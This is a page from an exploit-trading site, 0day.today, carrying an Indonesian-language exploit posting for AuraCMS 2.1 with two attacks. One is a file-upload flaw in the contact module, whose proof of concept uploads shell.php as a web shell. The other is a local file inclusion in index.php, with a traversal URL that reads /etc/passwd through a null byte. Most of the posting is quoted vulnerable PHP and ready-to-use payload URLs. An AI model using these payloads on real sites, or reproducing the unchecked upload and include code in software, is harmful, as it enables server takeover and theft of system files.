0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AuraCMS 2.1 Remote File Attachment / LFI Vulnerabilities
======================================================== AuraCMS 2.1 Remote File Attachment / LFI Vulnerabilities ======================================================== ######################################################################## # AuraCMS 2.1 - Remote File Attachment - Local File Inclusion # Vendor : http://www.auracms.org/ # Ditemukan oleh : k1tk4t # Lokasi : Indonesia ######################################################################## ==================================== Remote File Attachment Vulnerability ==================================== //berkas pada '/mod/contak.php' ---------------- Baris-41 -------------------- if ($_POST['submit']) { $nama = text_filter($_POST['nama']); $email = text_filter($_POST['email']); $pesan = nl2br(text_filter($_POST['pesan'], 2)); $images = text_filter($_POST['image']); checkemail($email); $gfx_check = intval($_POST['gfx_check']); if (!$nama) $error .= "Error: Please enter your name!<br />"; if (!$pesan) $error .= "Error: Please enter a message!<br />"; $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6); if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />"; if ($error) { $tengah.='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>'; } else { if (!empty ($image_name)){ $image_name = $_FILES['image']['name']; $image_temp = $_FILES['image']['tmp_name']; $tempat = "files/"; @copy($_FILES[image][tmp_name], "./files/".$image_name); if(@copy($_FILES[image][tmp_name], "./files/".$image_name)){ unlink($image); $sukses = "Sukses Upload File ".$image_name; }else{ $sukses = "Gagal Upload File ".$image_name; ---------------- Baris-61 -------------------- pemfilteran "$images" tidak sempurna, sehingga pengguna dapat mengupload/attachment file yang tidak diinginkan kedalam direktori /files/. //POC; http://localhost/auracms2.1/index.php?pilih=../mod/contak atau http://localhost/auracms2.1/index.php?pilih=contak&mod=yes isi semua konten isian, masukan angka 'security code' dengan benar, "Attachment" --> shell.php ; http://localhost/auracms2.1/files/shell.php =================================== Local File Inclusion Vulnerability =================================== //berkas pada '/index.php' - AuraCMS versi 2.x --------- baris-24 ---------- if (isset ($_GET['mod'])) $mod = $_GET['mod'] ; else $mod = ''; if(!isset($_GET['pilih'])){ include 'content/normal.php'; }else { if($mod == "yes" && file_exists("mod/$_GET[pilih].php")){ include "mod/$_GET[pilih].php"; } else { if (eregi('http://', $_GET['pilih']) or !file_exists("content/$_GET[pilih].php") or $_GET['pilih'] == 'index'){ $_GET['pilih'] = 'normal'; --------- baris-39 ---------- //berkas pada '/index.php' - AuraCMS versi 1.x --------- baris-13 ---------- <? if(!isset($pilih))$pilih=''; switch($pilih){ case '': include "normal.php"; break; default: if($mod == "yes" && file_exists("mod/$pilih.php")){ include "mod/$pilih.php"; } else { if (eregi('http://', $pilih) or !file_exists("$pilih.php")){ $pilih = 'normal'; } include "$pilih.php"; } break; } ?> --------- baris-33 ---------- need magic_quotes_gpc = off , jika magic_quotes_gpc = off maka pengguna dapat memanipulasi $pilih //POC; http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00 ######################################################################## Terimakasih untuk; str0ke, DNX xoron,iFX,x-ace,nyubi,arioo,selikoer,k1n9k0ng,aldy_BT,adhietslank dan semua temen2 komunitas security&hacking ----------------------- semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia # 0day.today [2024-12-25] #